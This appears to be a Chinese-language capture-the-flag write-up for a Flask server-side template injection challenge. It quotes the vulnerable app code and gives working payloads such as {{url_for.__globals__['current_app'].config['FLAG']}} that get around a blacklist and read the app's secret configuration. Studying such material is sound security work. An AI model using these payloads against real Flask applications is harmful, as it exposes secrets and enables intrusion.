知识点:flask的ssti
把它排一下(可以在pycharm按ctrl+alt+L然后再调调就好了)
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
#使不知道哪的FLAG赋值给当前app的配置变量FLAG
#应该需要我们拿到config的FLAG值
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/')
#装饰器,也就是说我们注入的格式为/shrine/{{....}}
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
#替换掉()
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
#过滤
return flask.render_template_string(safe_jinja(shrine))
#数据上传模板
if __name__ == '__main__':
app.run(debug=True)
访问/shrine/{{1*2}},显示2说明有ssti漏洞。
虽然过滤了config,但我们还有其他方法,一个一个试试。
这边没有显示出object的子类,这种行不通,换一种。
python还有一些内置函数,比如url_for和get_flashed_messages
/shrine/{{url_for.__globals__['current_app'].config['FLAG']}}
get_flashed_messages
返回之前在Flask中通过 flash() 传入的闪现信息列表。把字符串对象表示的消息加入到一个消息队列中,然后通过调用 get_flashed_messages() 方法取出(闪现信息只能取出一次,取出后闪现信息会被清空)。
大概意思应该是获取传递过来的数据
根据题目:
找到当前的app
/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
#__globals__会以字典类型返回当前位置的全部全局变量。
参考:
wp